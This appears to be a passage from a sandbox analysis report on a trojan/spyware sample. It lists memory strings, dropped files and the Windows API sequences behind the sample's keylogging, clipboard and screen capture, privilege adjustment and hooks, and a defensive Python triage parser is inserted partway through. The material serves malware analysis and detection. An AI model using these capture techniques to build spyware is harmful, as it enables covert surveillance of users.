                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe360
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setup.exe.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setupbeta.exe4(u7b4N
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://www.360.cn/xukexieyi.html#360
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: 360inst_install.exe.0.drString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 360inst_install.exe.0.drString found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
                      Source: powershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_034EE850
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_034EBC70
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_034EE4F0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C376EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376EB0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EB463 ExitWindowsEx,3_2_034EB463
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EB41B ExitWindowsEx,3_2_034EB41B
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EB43F ExitWindowsEx,3_2_034EB43F
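The API sequences in the capture block above are the concrete evidence behind the keylogging, clipboard and screen-capture signatures: 3_2_034EE850 reads the clipboard and polls GetKeyState inside a GetTickCount/Sleep loop, then writes to a file under a mutex; 3_2_034EBC70 is the GDI screenshot path (CreateCompatibleBitmap, StretchBlt, GetDIBits); 3_2_6C376EB0 is a CryptoAPI decrypt routine. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "Code function" format and groups the listed APIs into capability clusters so that a triage script, rather than a human, can spot the capture-then-write pattern. The clusters, the two-API threshold and the capability names are this example's own assumptions; the sample lines are copied from the report above.

```python
import re

# Heuristic API clusters for reading Joe Sandbox "Code function" lines.
# Assumption: these groupings and the two-API threshold are this example's
# own triage rules, not Joe Sandbox's signature definitions.
CAPABILITIES = {
    "clipboard_capture": {"OpenClipboard", "GetClipboardData", "CloseClipboard"},
    "keystroke_polling": {"GetKeyState", "GetTickCount", "DirectInput8Create"},
    "screen_capture": {"GetDesktopWindow", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "file_logging": {"CreateFileW", "WriteFile"},
    "crypto_decrypt": {"CryptImportKey", "CryptDecrypt"},
    "privilege_adjust": {"OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "process_enum": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
}
INPUT_CAPTURE = {"clipboard_capture", "keystroke_polling", "screen_capture"}

# Line shape: "Code function: <pid_n_addr> api,api,...,<pid_n_addr>"; the raw
# report repeats the function id after the API list, so it is dropped below.
FUNC_RE = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]+)\s+(.*)$")


def parse_code_function(line):
    """Return (function_id, [api, ...]) or None for lines of another kind."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    fid, rest = m.group(1), m.group(2)
    apis = [tok.strip() for tok in rest.split(",")]
    return fid, [a for a in apis if a and a != fid]


def classify(apis):
    """Map one function's API list to the capability clusters it matches."""
    present = set(apis)
    hits = {}
    for cap, cluster in CAPABILITIES.items():
        matched = present & cluster
        if len(matched) >= 2:  # one API alone (e.g. CreateFileW) is not evidence
            hits[cap] = sorted(matched)
    return hits


def triage(lines):
    """Per function id: capability names, matched APIs, and whether captured
    input is also written to disk (capture cluster plus file_logging)."""
    result = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        fid, apis = parsed
        hits = classify(apis)
        caps = sorted(hits)
        result[fid] = {
            "capabilities": caps,
            "evidence": hits,
            "captures_to_disk": bool(INPUT_CAPTURE & set(caps)) and "file_logging" in caps,
        }
    return result


# Sample input: lines copied from the report above (raw strings because of the
# Windows paths).
SAMPLE_LINES = [
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_034EE850",
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_034EBC70",
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_034EE4F0",
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C376EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376EB0",
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_034E6050",
    r"Source: C:\Users\Public\Bilite\Axialis\Update.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll",
]

if __name__ == "__main__":
    for fid, info in triage(SAMPLE_LINES).items():
        flag = " [captures to disk]" if info["captures_to_disk"] else ""
        print(f"{fid}: {', '.join(info['capabilities']) or 'no cluster'}{flag}")
```

Lines that are not in the "Code function" shape (the hook line, string lists) are skipped rather than mis-parsed, and a cluster only counts when two or more of its APIs appear, so a lone CreateFileW in a routine that merely checks a file size does not register as logging.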
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00404FAA
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_0041206B
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_0041022D
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00411F91
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E6EE0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E6C50
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034FE341
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034F8381
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034FEA1D
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E8900
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034FF9FF
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034FD89F
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034FDDF0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E24B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C377E80
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382576
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C390D62
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C3A2ED3
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382870
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C3958B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382A4B
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C38DBA0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382BC6
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C38C515
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C3A7502
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382638
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C377640
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C382771
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C3857A0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C396234
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_1001122F
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_100024B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_10010CDE
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_10012D91
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_10011E5C
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_1000B66A
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_10011780
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00910032
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00921206
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00912487
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00920CB5
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00922D68
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0091B641
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00921757
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0305F3BE
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0305D25E
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_030482BF
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0304689F
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0305D7AF
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0304660F
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_03041E6F
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0305DD00
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_03057D40
Source: Joe Sandbox View Dropped File: C:\Users\Public\Bilite\360inst_install.exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: String function: 034F4300 appears 32 times
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: String function: 6C38C970 appears 53 times
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: String function: 0040243B appears 37 times
Source: ErbgterT2R.exe Static PE information: invalid certificate
Source: 360inst_install.exe.0.dr Static PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
Source: 360inst_install.exe.0.dr Static PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
Source: ErbgterT2R.exe, 00000000.00000003.1711457163.00000000024ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1711457163.00000000024ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000000.1710480106.0000000000432000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000000.1710480106.0000000000432000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAxII> vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAxII> vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe vs ErbgterT2R.exe
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename360Installer.exe> vs ErbgterT2R.exe
Source: ErbgterT2R.exe Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe Binary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
Source: ErbgterT2R.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 360inst_install.exe.0.dr Binary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG
Source: ndtidaod.png.0.dr Binary or memory string: h.vbP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E7B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_034E7B70
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E7740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_034E7740
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E7620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_034E7620
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034E6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_034E6050
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
Source: C:\Users\user\Desktop\ErbgterT2R.exe File created: C:\Users\Public\Bilite
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\Update.exe Mutant created: \Sessions\1\BaseNamedObjects\2024.12.27
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\Update.exe File created: C:\Users\user\AppData\Local\Temp\monitor.bat
Source: C:\Users\Public\Bilite\Axialis\Update.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: ErbgterT2R.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
